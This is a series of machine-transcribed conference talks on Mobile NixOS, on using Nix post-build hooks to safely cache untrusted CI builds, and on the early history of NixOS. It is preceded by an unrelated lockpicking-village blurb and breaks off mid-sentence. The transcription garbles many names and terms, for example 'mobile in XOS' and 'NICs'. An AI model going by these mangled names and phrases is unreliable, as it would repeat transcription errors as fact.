Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50690 (DOI)
I'm Samuel Dier, you might recognize this avatar. High work on mobile in XOS. What's mobile in XOS? Mobile in XOS is a normal distribution for your phone. Some conditions may apply. The goals are with integrating an heterogeneous ecosystem, which means different kinds of phones, different lineage of phones, and all of this in one repository. And its goal also is to make full use of the hardware. This means calling, SMS, data, acceleration, everything. If you can't call from your phone, it's not a phone, it's just a screen. And then if you can't use the internet from your screen, it's just a useless screen. Then it should work like in XOS and work with XOS. I think it's easier to start with some things that I don't aim to do right now or maybe not ever under the project name. Like I don't want to prescribe any kind of graphical environment. So just like with XOS, you're free to choose whatever you want to run as long as it's packaged. And if it's not, then call and contribute. I don't intend to make it particularly easy to run Android apps, but it's just something that can be done via software since there's projects like Endbox that already do this. Then porting devices to mainline in X. I know it's not nice to say that I don't have a goal to port devices to mainline in X, but it's mobile in XOS that doesn't have this goal because I think it's a fun side project that's probably going to happen for at least those that I can try it on. Let's start with some history. In June 2018, that's when I made the first commit. And it's also when I announced the project on the discourse. In July 2018, I had a second device ported. This is nice since this allowed me to check if there were some bad assumptions in there, some but not that much. And then from July to November 2018, I got Bozy releasing XOS, the 1809. Then an uncomfortable long post. Generator to first 2019. There was a post on the discourse from Armin introducing the NGI zero on the discourse. So I joined January 31st. I wrote and sent an application for a grant. And the deadline was the 1st of February. So didn't take that much time to write up. More on that later. I was selected for second round. This is good. And in March, I received some questions from NLNet. Turns out my application was too narrow in scope. They wanted me to expand the scope and thus expanding the grant. So I did. And after back and forth, the project was accepted. Then the more important bit for me, it's that in August 2019, I left my job and now I'm working full time on mobile and XOS. The current state. Right now, we have three devices booting mobile and XOS and I think I didn't hold power long enough on the other. I hate phones. Then I know it's just way too small to see. But it's just for flare. There it is. It's booting on two different devices. And those devices, there's the ASUS Zenfone 2 laser. It's the one on your left. It's much older than the other devices. The Zenfone 2 laser is pretty much in the first or maybe second round of AR64 devices for Android. And the Xiaomi Redmi Note 7 is the one on the right, which is fun since it's pretty new. It's released, I think, in the beginning of this year. So this allows me to just check that, okay, this works on both old and new hardware. This is just amazing because it works on old and new hardware. Every one plus one plus three, I don't have it with me. But this one was just trivial to port. It's probably about in between in term of age. But about three hours since I received it in the mail, it was already ported and booting just to the same state as you can see, maybe, I hope, probably not on those phones. I have other targets like the ASUS CT100. This one is interesting since it's not an Android target. This is a Chrome OS-based tablet. This allows me to test whether I made assumptions that were only for Android-based, for Qualcomm-based Android devices, even. And it turns out not much. And I added the target. So I've got an example for two different kind of targets. There's the Google Nexus 7 2013. This one is special since it's the second device I ported it to, but it's not AR64. Not AR64 as with standard Nexus OS since it ends up being standard Nexus OS system once booted. There's no binary cache, so I did not test stage two yet. But I have strong assumptions that it's going to work once I've got a full build of the stage two working, not working but building. Motorola's at play. Not working entirely, but you see there's a DD after work in progress. That's because it's my daily driver. I can't spare the phone for now to test. So this one is currently yellow, but it might stay yellow just as the Nexus 7. This is because Motorola, they are not alone in ASOAMs to do this. They release an AR64 device with 32 bits, so ARM V7L user end. So depending on how access to hardware works, like Wi-Fi and maybe not Wi-Fi but probably some other hardware, it might not be possible to run a 64-bit system using the proprietary bits. Let's see how it goes. Then there's the Google Pixel 2 XL. This one is just working progress since I don't have it on hand anymore, but I was able to get one for a couple of days and just work. It's almost working. There's just one little bit and might be trivial to fix. And AQM UVM. This one is not AR64. It's used mainly to test the system image generation and check the graphical applications since you want. You don't want to first build for AR64 and then transfer it to your phone and this takes quite a while. So the VM is for developers to develop applications. So stuff that's currently working progress, meaning hacks I'm currently using to make a boot. The kernel is built in and without model support. Built in means it's built into the boot.img file that's flashed to the boot partition. I'll show you around that and why it's an issue soon. And without model support, it's not much of an issue. It's just more easier to start porting when you don't have to bother with modules resolution. Is it loading right modules in your custom stage one that you currently can't access via Serial since there's no Serial access on most phones? So you always boot the current generation. That's another hack. You can't choose a generation at boot. There's no, there's not some of your usual grub or system reboot or anything as a boot loader. It's ABL or Aboot for the Android devices. This means that there's no choice for the generation. So if you make a small accident with your next OS rebuild switch, you might need to reinstall for now. But that's just for now. And there's limited hardware support, meaning that there's not much of the hardware working. There's sound lacking, which might not be much of an issue to fix. There's Wi-Fi not working, but everything is known. It's just, I'm lacking some, I've been lacking time to finish working on that. There's no GPU acceleration, but I've got a contribution which might do all that already. And there's no cellular communication, so no calls, no SMS, no data. And then there's no proper phone interface. What I mean by that is there's no like a Plasma mobile or Foush, or it's just your usual X11 desktop, which, well, it's not made for touch, even on a real big screen like a tablet. So it's all room for improvement. So let's see how I'm going to improve. I'm going to write documentation. I know it sounds weird writing documentation, but it's important. So the basic structure, so you know how everything is put together. Then a porting guide. Since currently the only way it works for porting is I try to port to a new device and I see, oh right, I fixed that on the other device by switching which options and that's not a great guide. And then a list of devices and their status. Just for, you know, like when you're going on the line, iOS website, you've got a list of devices and their status, same thing. And a website tying this all together. I know this is not the fun bit. I need to work on enhancing the boot process. There's a couple of steps in there. First, selecting a generation. This is quite important and inside the ADN, DDNA of NextOS. We probably need to K-execute to another kernel. Since switching kernel is not easy, ideally I'd like every generation to list which kernel they use exactly and treat the boot IMG just like it was a bootloader. Then there's a strategy for a virtual keyboard during stage one that's needed since you don't want to break out your full USB keyboard and plug it into a USB adapter to your phone when you're rebooting it since it crashed for whatever reason, maybe not mobile in NextOS's fault. Then enhancing the boot progress reporting since right now it's just an image telling you it's stage one and then another image for stage two. It's probably better if you have some output like it's currently doing this thing, this thing, this thing, this thing. All work in progress. Then we need to make more things work like sound, GPU acceleration, Wi-Fi and everything so you know. Phone software. This is not about phone environments, it's about telephony software. I don't think there's much package in NextOS right now so just taking time to do this and then about a phone environment. What I mean by that is just like the E's, WM's, DM's, you all know what this means then I want you to know that Pee Hee means phone environment. Let's continue with questions I already know you have in your mind and you want to ask me. What do I need to port? What do I need to port? You need first an unlockable bootloader and also to have unlocked your bootloader. It's not enough to just have one that's unlockable. And then kernel sources. I did write for SPD port. It's possible without the sources but it's going to be in a uphill battle. How can you help? You can help by porting to new devices. That's like the first way, it's probably the best way to help since there's so many devices and so many hours in a day. Then you can test with the devices you own. If you already own one of the devices listed previously or one of the devices that's going to be listed in the future, you can just run it hopefully. Then packaging software. This could be done without even any mobile phone. With the QMUVM, some work on some of the parts of the stack, most likely the phone environment, some of the software testing that things work as expected. Things can be done without even having a phone that's supported. Other things you can do to help. Talk about it. Not only talk about mobile and XOS, just forget about it for one minute. It needs to become ingrained in everyone's head. Maybe not the normal people but every geek that has a phone. It shouldn't be normal to want to run another mobile operating system. I'm not saying necessarily a new Linux distribution. It should be normal to even want windows on your phone. You probably don't want it. But it should be normal to want to run whatever you want on your phone. This is not something that we can fix. It's something that can be fixed most likely by the OEMs but even then most likely by the manufacturers of the CPUs, the system and chips. Let's try and make this an issue that's known and that, anyways, high most likely will not buy a phone where I can't control the boot process from A to Z and another issue phones where it's easy to break by accidentally flashing to the wrong partition. I didn't skip anything. This is how something that's to be continued. Again, now I'm ready for your questions hopefully. Ask me anything. We've got some time. Hey, how many phones have you bricked while trying to run this? Can you repeat please? How many phones have you broken? None. It's the easy way. You don't have much risk as long as you don't flash the boot loader, the one bit before Linux. If you only flash the bits on your Android phone where Linux resides, it's as far as I know like 99.99999% safe. I don't want you to come to me when you break a phone, but I think that as long as you don't flash stuff to partitions you shouldn't flash stuff to, it's going to be fine. I have a question of my own. You still keep the original kernel in place in the new Kexec or do you even replace the original kernel? Currently right now it's building the OEM provided kernels. Why? The reason is simple. Everything already works with that kernel. The Wi-Fi, the cameras, the sound, everything is supposed to work with this kernel. Then this kernel could get updated. Some projects already update kernels from Android OEMs. What I like is that there's always going to be the boot.img kernel that's going to be a stable one, one that you trust, one that you've built and you know works. Then you're always able to just kick-exec into a new kernel that might be in line, hopefully be in line and where you're working on porting it and bettering the whole Linux ecosystem. If I have a line-HOS device which has all your checkmarks checked, how much hard work and sweat separates me from booting XOS mobile like days, weeks, months? Your first port may be a week depending on if you're lucky, if the phone is trivial to port to, but when you're using a phone that's already well supported with line-HOS, in my experience it's much easier since everything is listed already in the open. Other phones to port to are phones where there's only the OEM source dump and no community yet like the Redmi Note 7 right here. Fun story, that's my first Xiaomi kernel, first Xiaomi phone, first Xiaomi kernel from their open source kernel release. It would not boot, not at all. I finally figured it out since during this time some other projects were porting it and then when I found out which option I was lacking, I searched online what this option was doing and it's documented in the wiki of the project. So basically read the docs. So when you use the kernel sources from the OEMs, can you reuse the Linux builds that we use in X packages or do you have to write your own build files for that? When a device gets ported to mainline, then generate would mean that you can use a normal kernel, but until then you're going to need to build a kernel specialized for your phone or maybe a family of phones. Is it the right answer, the right question that I answered? So if you're using the OEMs kernel with their modules and drivers which would support the hardware like LTE, what is the challenge to get those devices working? Can you repeat the end of the question? What's standing between you and supporting the devices like sound and modems? For porting to mainline, the main issue is that most of the times the OEMs just drop horribly at Russia's code to just make it work and so it just can't be ported forward. Sometimes there's also breakage in the kernel APIs, the internal APIs and it's normal, it's to be expected. They never said that a kernel API is stable. It's the kernel API for user land that is stable. So that's one main issue. And then about just porting to this kernel to work on mobile next OS, no issues. That's exactly what we're using. We're using the OEM dumps to get started. Perhaps one more question. Have you looked at packaging what JOLLA has as their UI, the continuation of the Nokia operating system? Can you repeat please? I didn't hear you. The JOLLA operating system, the Sailfish, if you have looked at packaging those things because I don't think they're going to be extra friendly to packaging outside of their distribution. Currently I'm not working on anything else than a standard new Linux distribution. So it should be possible, just like everything is possible with enough time to make the whole Sailfish OS build with Nix. But it's more Sailfish OS, even though it's more newly Nix than Android, it's still on OS like just Loon OS, which is the open source part of WebOS, is it sound integrated operating system. Just taking bits from them sometimes is harder, so it should be possible, but it's not a current goal due to lack of human power working on the project. Maybe in the future we will. Any more questions? Would you benefit of us giving you our old phones to make them all work on Nix OS? I would benefit if you were to use your old phone to port it too. Not only because I'm lazy, but also because you're going to have a phone with mobile Nix OS in your hands, so you're going to be able to test it and maybe file bugs or even better PRs for whatever is missing for you. Then the second question would be for the grant that you got. Is it limited to some extent to only to you or is it possible that in the future you might extend your project to have multiple people working on that as well? If I understood what it's about, the grant. I'm not perfectly sure. I could ask people from the internet that I think are hidden in the room and they would tell me if it's all right. But I think so. The best thing to do is write a new proposal. Since there is no microphone, the best thing to do is to write a new proposal, which means from myself or something like that. If you have additional features that you would like, if you have additional features or additional phones that you would like to help, which are maybe not as large as the stuff that Samuel is doing right now, but you can also ask for fairly small grants to help. That's the question answered. If you want to do a whole desktop, which would be a larger thing, that's all fine with us. It was fun presenting to you. Have a nice day. Thank you so much. Thank you.
Building and managing your mobile device's operating system with Nix, Nixpkgs and NixOS? More likely than you think! Even on the device you already own*! *some conditions may apply
10.5446/50692 (DOI)
I'm going to start by saying hello to the audience. Hello. Hello. Hello. Hello. Hello. Hello. Hello. Hello. Hello. Hello. Hello. Hello. There we go. Hi, I'm Florian. The internet knows me as Flucly. Apart from doing X packaging all day, I'm interested in build pipelines, infrastructure, low level user space stuff, networking, and thinking with hardware in general at work. I work as a site reliability engineer at TWEEK. By the way, they are hiring so if you're interested in that, just reach out. Today I'm going to talk about untrusted CI and how to use post-build hooks to get automatic caching of untrusted builds. I'll be talking about CI in general, what you want a CI to do and how you want it to behave, about NICs binary caches in general, how to use private caches and how to handle signature of those builds in the private caches, how to handle limitations in simple implementations, proposed solution, how this improves things in general and future ideas on what to do with it. So how do we want to see I to behave? Well, it should in general, it should lint, it should analyze, it should build, it should test and package your project. It should do that on each commit to assist developers in their workflow while they are iterating over a PR. So especially you want it to run on PRs to discover all breakages before they reach master, or most of the breakages before they reach master. But most importantly, you want your CI to be fast. So if you're waiting for like 30 minutes or an hour to get your tests to pass or not to pass and you basically blocked on spending your time on this, you, yeah, that's just a huge problem and massively decreases developer productivity. So yeah, with a small project, that's not so much a problem, but as projects grow and yeah, build time likely does as well. So still having a snap PCI becomes more and more challenging. And yeah, when using NICs to provide those dependencies or like build the entire project, you can make use of binary caches. In fact, we do already most of the time there's cache NICs also for all the packages and NICs packages built by Hydra, except unfree and packages currently failing, but that's another story. However, in your project, there might also be other packages not generically suitable for NICs packages because they are domain specific stuff, they are custom overwrites on unfree packages, and you still want to cache those in your CI pipeline. So what you then do most of the time is you might have an Hydra or whatever does your build, but in general you go with a private cache of some sorts that is added on your developer machines and they can make use of this cache in of some sorts. It's either self-hosted or based on some bucket in some cloud or entirely managed. So I'm gonna be talking about how to set up those caches quickly. What you do is you generate a signing key, signing key pair on one machine. On all machines that use this cache, you configure your NIC source configuration or your NICs conf to point to those endpoints, to the public endpoints to download the binaries from, and you add the public key part of the signing key pair. And to upload you use some sort of NICs copy command eventually, or you expose your entire NIC store of some machine to the others. And in general NICs copy supports like SSHNG to copy to another machine, HTTPS, like HTTP put to upload stuff, S3 buckets, and there's a in progress PR to push to GCI spackets as well. Yeah, so assuming your project has a default NICs and dependency attribute containing all the dependencies of your project, you might end up with doing something like this. Oh, I should probably not move the mouse. Yeah, you somehow get a list of all the dependencies and all the NICs store paths that are part of your build, of your dependencies of your build or of your entire project, and then you issue a NICs copy command if you don't expose the NICs store. Yeah, so what are the limitations of this naive approach? It might work in a lot of cases, but sometimes there's some drawbacks. Like you might not have all the built dependencies available at a central location, so you can't call NICs build-a and some magic attribute because there's scripts invoking NICs by themselves. You have some shell scripts calling like calling NIC shell or you have Bazel shelling out to NICs build to build other packages, so you might you have IFD and don't really know at first what you're gonna be end up building with. Yeah, and then you can of course you can track those manually in your.NICs file and make sure that you cache everything that you basically catch all the packages you want to build and make sure you say I built it and then you start the actual build process, but that's all like quite laborious and it gets even harder. Yeah, it doesn't get better. Another problem is that if one of those packages fails to build, the approach of waiting for the output path and then copying over the whole transitive closure will just won't kick in because it never got a chance to upload this intermediate dependencies if you have not specified them before. So yeah, you might end up bumping a higher level thing, it fails to build and all those other dependencies you also need to rebuild for some reason, they just don't end up in the cache because you never reach to the endpoint of actually building the package, like the leave package in your dependency. Another problem is that the upload is another manual step in your CI pipeline. Very likely you end up with code dealing with all the signing and uploading part inside your CI code itself that should in theory only say like I'd like to build this thing and then it should be cached. You don't really want to mess with with looking what you want to upload and then manual calling to upload it, it just just normally should just work and it shouldn't increase your pipeline code. And another problem which I personally find a bit of a bigger problem, like as the binary cache is added and used as a substitute on all developer machines or probably even production machines, having wide access to it and having developers or external contributors being able to change this way of your scripting inside your CI pipeline, it's very easy to extract the signing key and you basically don't want to have a backdoor and want to have somehow a way to pollute the cache in some sorts. Yeah, so yeah, that's all not so nice. And while one and two might just decrease cache misses and three might be just annoying, like three and four together due to the reasons mentioned basically requires some sort of approval process for PRs, at least for external PRs. Yes, and that's all not very nice and negatively impacting both cache rate and this around time for developers. So how do we solve this? There's one way to solve it that I'm going to propose. It's with together with multi-user NICs and some recently introduced NICs feature you can basically fix this. Yeah, you basically what you do is you have a CI user that runs your regular build process. It uploads a build recipe to a privileged NICs daemon. Oh, those animations work, nice. And this NICs daemon is basically instructing all the builds to happen on some temporary unprivileged other sandboxed build users and afterwards it takes care of persisting it to the local NICs store. And assuming you have no local user privilege escalation on that machine or some weird hash collisions, this effectively prevents regular CI users from manipulating the local NICs store. Like in a non-multi-user NICs installation, basically all those three different concerns would be running as the same user. So the regular CI user could in practice like modify the NICs store in some weird ways in some cases. So yeah, multi-user NICs in that case solves a lot of those concerns and isolates this. It's a default on NICs OS, but it's not the default on a lot of dehosted CI's. Like if you have Trevins or Jenkins and you have your Docker-based CI and it's basically there's like a shell script that you call to install NICs and then you end up with a single user NICs installation. Yeah, I will... No, no, no, it's one way to configure NICs in a certain case. Okay, so with that we kind of solved the direct access to the NICs store, but we did not yet solve the signing part. So if we go with the bash loop approach we saw previously, we still end up signing inside the context of the CI user. So the CI user can still like change stuff before uploading to the remote cache and that's something we don't want to do because this way the user can still extract the signing key and if he has some way to access the the S3 bucket or something he could modify stuff, resign and basically get code execution on other machines. So yeah, we don't want to do this. As I said with NICs 2.3 there's a way around. You can configure a post-build hook, which basically gets triggered for each realized derivation, even the intermediate ones, and in multi-user NICs it's run as in the context of the NICs daemon. So as a privileged user and you don't have the problem with exposing the key to the CI user and instead it's run as maybe as the root user. Yeah, there's some side notes regarding this. Like normally you don't want to exit NICs copy there because it's blocking. You want... Basically you want to queue the upload to happen to some other processor so you don't block the main build process. So let's look back at our limitations that I spoke about. The CI user doesn't have any direct access to the local NICs store anymore and doesn't have access to the signing key. So there's no way to produce a modified signed artifact under the original store path, which effectively fixes number four. As I said, like in some cloud environments, users might still be able to alter files in the cache because it's just like a cloud setting that this machine is allowed to access this bucket. But as it cannot access the signatures, substitution won't happen because NICs will verify the signature. It will realize, hey, it's the wrong signature. It won't substitute from there and it might fall back to build locally. By moving the uploading logic away from the CI pipeline into the generic post-built hook in a multi-usernix configuration, we also fix three because we don't need to have any manual scripts inside our CI process. And because the post-built hook is triggered on each derivation realized in NICs store, no matter how we end up building this, we also solve two and one. Yes, so we don't need to manually maintain another list of dependencies. We just catch all intermediate builds. So as I said, like a buff architecture will automatically upload all builds happening on a certain machine into the binary cache and can be entirely described in the CI built slave image that you want on your cloud provider maybe without the need for any cache-related configuration in the build pipeline itself. That means it's currently most suitable when you provide your own self-hosted builders because multi-usernix requires multiple users and setting those up outside the repo and not inside of some of those, setting those up outside the repo, most of the time means like you can't use a lot of the hosted CI solutions that have used some sort of shared runners because there's just no way to set up other users there. It's just often not possible. But depending on your thread model, you could still start using post-built hooks in a single-usernix setting which will at least solve one limitation one, two, and three. Yeah, that's what I already spoke about. Yeah, another problem is that running Nix inside Docker requires privileged containers because of some of the sandboxing features not currently working and failing. So it might be unsuitable for some container platforms. Another problem is that the official NixOS Nix Docker image doesn't provide a multi-use installation but it's based on Alpine and the shell script installing Nix. Yeah, but as I said, depending on the platform you're running on, you could go with multi-user Docker containers, privileged ones as well. Yeah, so TLDR, use post-built hooks to upload to the cache instead of other hacks. Future plans. So when new machines are spinned up in off-bork, they often hit another node in the next off-bork run and you have to wait again for the pensies to be compiled. So one way to fix this might be to have off-bork, use not the official cache NixOS org bucket but another bucket that all the builders share and we could still not worry about having to pay too much money for it because we could just nuke it. Nobody's really relying on it and we can rebuild it. So either by garbage collecting or throwing the way completely in like some weeks, for all some weeks. What I'd also like to see is nicer tooling in general and documentation on how to use it. A daemon to handle the asynchronous uploads. There's a Nix copy PR to upload to support ECS that would also help in some cloud environments but it's not strictly related to post-built. Yeah, and as I said, more documentation in general and how to integrate this with ECS. So maybe some NixOS module describing on how to write this all together for your own self-hosted machines. Have some code ready that I would like to open source but it's really not so much. Not so much code. And also maybe a GitHub action template. I mean you with GitHub actions as far as I know you cannot have multiple users but you could at least get like the single user parts set up with post-built hooks. Yeah, and some blog posts describing this in a more readable fashion than a slide. That's from my side. Thanks. Any questions? Have you looked into implementing a post-built hook script that can upload the source tar balls and the patch files that were used to do the build to a content address tar ball cache? No, but it's an interesting experimentation field. When the build hook fails, post-built hook fails, does your build fail? I don't know to be honest. Okay, and logs of the build hook, will they kind of say if I run this from Hydra, where are the logs of this hook go to? Will they end up in the log of the build? I think it's the next demon logging it. Can you get the mic? I'll like this. Yeah. The hook output always goes to the user's terminal. If the hook fails, the build succeeds but no further builds execute and the hook executes synchronously and blocks other builds from progressing while it runs. Okay. You mentioned possibly doing garbage collection of the S3 buckets. Does such a function actually exist with Nix collect garbage or a tool to garbage collect the buckets? I think there's a Perl script which is a bit old but I don't think we're actually running it on CacheNix or Sorg and we could dog food this script on the off-bork bucket. All right. So if there's any more questions, feel free to hit me after the talk. Thanks.
This talk describes how to use post-build hooks, a recently added Nix feature, to automatically sign and upload artifacts to a binary cache, so they can be re-used for subsequent builds. It compares that approach with existing ones, and explains why using post-build hooks are superior in terms of what's cached, and when it comes to building untrusted code, for example Pull Requests from external contributors. Finally, it shows an example on how this can be set up in a cloud provider setting, and discusses further improvements.
10.5446/50693 (DOI)
So the next talk is going to be about Dark and Murky Palsk of Nixos. So it's me again. So before we start, I first want to announce a little bit of a contest. The first person to actually package this thing into Nix packages will win this very hard, ugly hard plastic MSN figurine. Actually it no longer works on MSN because MSN is no longer working but it does work on Linux. So get cracking. So and if you're thinking about adding support for this to Hydra, that's even better. So because you know what, it actually has LEDs and can flap its wings and all that. It's really cool. So if you want to be woken up in the middle of the night because your build failed, it's perfect. So I got some more of them. So I'm going to talk about the history of Nixos and this is not necessarily the real history so some of the facts might have been changed for dramatic effect. But who cares? So it's all in the past anyway. So a little bit about me. I actually studied computer science at the University together with Ilko and Rob. And my master thesis was Nixos. So I created the very first Nixos. So it's because of me that you are here. So it would have happened one way or another anyway but I just accelerated it. So after that I drifted away to do other things mostly first system administration. I used to be on the board of NLUIG, formerly known as the Dutch Unix User Group. And then I got more into legal and licensing so I was on the core team of GPLviolations.org for about seven years. And now I'm having my own consultancy focusing on open source license compliance, software provenance and so on. So things about reproducible builds, where software is coming from is still very important in my day to day job. Because when I actually have to go to court and then show like, oh well this is where this particular software came from, then knowing exactly where it came from, how it was built is actually very, very important to me. So about me, so I started using Linux and open source somewhere in 1994, first free BSD. And then later we switched at home, we switched to Linux in 1995, Slackware. And that was before Windows 95 was released. So I only started using Windows 95 or 98 when it was already a few years old. So in 1996 I started studying at Uttar University. So Ilka was actually one of the first other students that I even talked to, so on the first day. So we've known each other for quite a long time. So I already had some experience with Linux, free BSD, then we got HP, Wax and Irox. I can tell you it's nothing like in Jurassic Park. But so and then Solaris a year later. And although I've used Linux exclusively for a very long time, I've always been a bit of a BSD fanboy and I have proof. So that's actually Kurt McCusick. So an old Unix guy, super nice guy, if you ever meet him in a conference just go talk to him. He knows a lot of stuff about the history of Unix and he's done so much. That's unbelievable. Anyway, there were some frustrations. Some friends actually studied physics and they got really deep into Debian. And I was using HP, Wax, Irox, another Linux and free BSD at home. And then whenever I said, you know, this problem, how should I, and then their default answer would be up, get install. That really turned me off. So that's like, come on. So every conversation ended with up, get install. It's like, okay, bye. And that just like, it's, if they wouldn't have done that, I might have been using Debian, but that was like, okay, this is not for me. If this is your attitude, then this is not for me. All right. So through a friend I got involved in Rock Linux. I'm not sure if anyone here has ever heard of Rock Linux. They, oh, one person. It was a long time ago. So and I especially worked on the ultra spark port because admittedly I was also a bit of a sun fan boy. But that distribution was a built from source thing, much like Gen2, but then a little bit before Gen2 and maybe not as polished as Gen2. But it, what attracted me is what it was kind of influenced by the free BSD port system that I really liked. And in the end, it wasn't a very successful project. Gen2 took their entire market basically overnight. And I just ended up installing Red Hat Linux and later Fedora Core and have stayed with that forever since. So around 2002, I took over the management or maybe the mismanagement of a student lab at the university. And I also got very interested in things like portability because of my experience with other operating systems and other architectures as well. So one day a very big pile of old PCs became available and we just started like, okay, well, these are going to be trashed anyway. So why don't we do anything with it? So we will, I just hold them to the lab. We stacked them up. We installed different operating systems on it. And we started to play with build form software. So December build form, Tindall box, also some build form software from the University of Amsterdam. And I've forgotten the name. I don't even no longer know. Do you still know what it will go forgot to? And one test case for us was the strategic, strategic XT program transformation tool. So that looked a little bit like that. So the person on the right is actually Martin who was the number three, I think the number three committer to NICS packages. So he hasn't done anything for over a decade, I think, but he can still be found somewhere in the lock. So it's a lot of beige, lots of Dell taking up a lot of space as well. But this is what we did is we played around. And what we found is that the build form software was suboptimal at best. So some builds would sometimes fill because I did an update of the base system. So some builds, they would run perfectly. Then it's like, okay, there's a security update. I would just install the security update and then the build would fill. And debugging that would just be so incredibly hard. So basically, we took the approach like, okay, well, you know, don't touch it or it will break. Of course, these machines were connected to the internet. So that's not a good idea. But it was a very useful learning experience for us. I wrote a paper about that that you can still find. I presented it at the UK UIG Linux conference in 2003. So it was in Edinburgh. It was very nice in summer. I just did the start of the French festival, so I got lucky. So around this time, Ilco had already started working on NICS and one of the first use cases being release management for, again, Stratigo XT. And I have proof for that. So this is from an old conference where it actually says, release management for Stratigo XT with NICS. See, I didn't lie. Where he's also talking about stuff that I don't even understand. Like, what is it? Software deployment as a memory management? I think that's in your thesis, right? So if you really want to know about what it all means, just read this thesis. So of course, there was already something before NICS. It was called Mac. So that software never saw an official release, but at one point it did have a Wikipedia page. So I think it's probably been deleted a long time ago. And a little known fact, Bra Modena from Vimfame, he was also working on a release tool called App, which was sponsored by NLNet. There they are again. And one thing is that I basically connected, but I'm who I happen to know at the time, NLCO, and they just spent a day talking about, I don't even know what you talked about, probably about ideas about the different systems. You probably know a lot more about that. Or you might have forgotten. Mostly forgotten. It was a long time ago. So when I was looking for a project for my master thesis, I tried some and failed. And basically I was looking for something like, okay, I really have to finish studying. So what they actually said is, well, why don't you try to build a complete Linux distribution with NICS? And back then, already some work had been done by NICSU, which was a quite minimal user mode Linux based distribution. So it wasn't the kernel. It was basically some user land tools that were working. So there was actually something before NICSOS called NICSU. I think you can still find it in the repositories. I wouldn't recommend trying it, but it's still there. But my goal was to go all the way and actually install it onto real hardware just to make sure, like, okay, can we do this? Will this actually work? Because at that time we didn't know. So I took NICSU. I expanded on it because I'm quite a stubborn person. I tried to build things on my Fedora core and Ilco was using SUSE. And yeah, well, you know, they say, you know, Linux standard base. Well, my ass. Like, no way. There were so many differences between those two distributions that it was just painful. So one of the things was with the C library, I think with the MPTL threading library, that was just a ton of pain. So Fedora took a much different approach to that than SUSE did. And that just caused lots of troubles. So in the end, I convinced Ilco that this was a problem. And then he introduced a statically built environment. And I think that that is still more or less in NICS today, but not in the way we actually made it. So my main contribution there was just to moan a lot so Ilco would actually attack this problem. And that's usually a very good strategy when dealing with Ilco. You're just, you're just a bitch. It takes some time, but then it just fixes it like that. So I actually added quite a few of the tools there, and then I added most of them. I did the static builds. I added them to the subversion repository and so on. And after that, we just started hacking. So this is a very early engineering note. I still don't know what Ilco was trying to say here, but I think it was a little bit about how the store worked. You really have to improve your handwriting. So after adding enough of the essential tools, we actually got it to work and got it transferred to some real hardware. So both virtual and real. So we had some VM-Bare virtual machines, and we also installed it on a real PC. And we were just happily playing around with it. And then we thought we were toying around. And then all of a sudden we realized, like, okay, well, we forgot to create the bin SH sim link. But most of the tools worked. So at that time, we knew, like, okay, well, a lot of the programs out there actually do not depend on bin SH being present in the system. And it will just work fine without them. So Linux standards base, you don't actually don't need it. At least for most programs, you actually don't need it. So at that point, we knew that this would work. And that gave the project a major boost. And that made Ilco very happy, as I can show you here. Now, where is this? This is the worst photo that's in there. But can you see the green stuff there? The SUSE DVDs? Ilco exposed. So when then we installed a new build form with two main machines called itchy and scratchy and also a whole other, another pile of machines. So we were definitely into the Simpsons, as you can tell. So and eventually those two machines were completely reinstalled with NixOS very early on. I was just a little bit hesitant, but just Ilco just said, like, we're just going to install NixOS on it and just use it on those machines. And that worked really well. And I think those machines ran for how long? Four or five years? Quite a long time, doing lots and lots of builds. So it was like this, a little bit tidier, as you can see. So the two main build machines were up there. And the other ones were just all kinds of other machines that we installed with various operating systems. But eventually those were all scrapped. And I think that we only used the two upper machines. So I did some more work on NixOS then. I actually made installation cities, which I then installed on some of the machines that I showed to you. And I also tried to do some cross-complation. I had some old Java stations, actually, and with a Spark processor. And what I tried to do is to create a cross-complation environment with GCC. And that turned out to be incredibly hard. I still don't know why. So these days it's a lot better. But at that point in time it was just impossibly hard to do. I don't know why. Something with the include paths or that it would have something like DD. It would try to invoke a previously built compiler for the wrong platform or something and libraries and big mess. So after that I moved away from NixOS. But I still kept contributing to a few packages for a few years. But I don't think that there's much that survives to this day. I mean, maybe a few brackets here and there that you can still find when using Git blame. But you know I still have some of the pictures. We basically say there's no pictures. So one thing that I can do is actually, so Ilko dug up an old boot session, a movie with an old boot session of NixOS in June 2005. So it's June 2005. So if you want to see that, it's very, very bare bones. So I think this is actually Oco typing. Yeah, so this was very, very rough. Not a lot of automation going on at that point. I'm not sure why Ilko was typing so slow. So one thing that you will notice is at this point we didn't actually yet correctly set the path because it said command not found found for LS. So we used echo, which was a dirty hack, but it works. So in case you ever wipe your environment, that's actually a good hack. So we didn't actually set the path back then. I think we were just a few months in here at this point. So just so you know, wild cards, they don't work. So I think this was definitely Ilko typing. We eventually, we could be cut there. We just had to find the right derivation. Now that was very old school, old school next OS. So I think that's the end. All right, so to wrap up, so technically I started next OS, but since then it is because of you that it has grown so much. So I actually want to thank you for putting so much work into it and making it a lot, lot better. So thank you. So of course we might have some time for some more embarrassing stories. If anyone wants to hear. Why did you move away from next OS? I got a job and that didn't involve next OS. And at that point I was very, very getting very deeply into the licensing stuff. So basically didn't have any free time left at all to tinker with things, but I still updated a few packages here and there. Any other questions? I'm curious about this idea of running the activation script from Grubb while you're booting. If that was an idea you had from the beginning or something you came up with along the way. This was 14 years ago. I honestly don't remember. I just needed to get stuff done. So I really don't remember. Fair enough. Are you using next OS again now? So if you actually saw my talk from yesterday, no. So right now I'm still on Fedora. So some people are trying to convince me to go back to next OS. So Rob already tried to install it while we were driving here. I just said, well, he said, well, yeah, just give me the laptop. I'll install it now. I just said, keep your eyes on the road. It will be a lot better. So yeah, I should go back into it, but first I have to finish a few other things. First need to get some clients off my back. Who was the first other person you convinced to install next OS other than you two? Actually, in our lab, there were quite a few people quite eager to install it. So I think so Martin, who was there as the number three committer, was also very interested in a few other people in the lab as well. And I'm not sure how it actually spread. Do you still know how it actually spread outside of our lab? Was it through the, probably through Haskell, some Haskell people, I think? I really can remember. Yeah, they were very early contributors like Ludovic, who started Geeks. I don't know when he showed up, 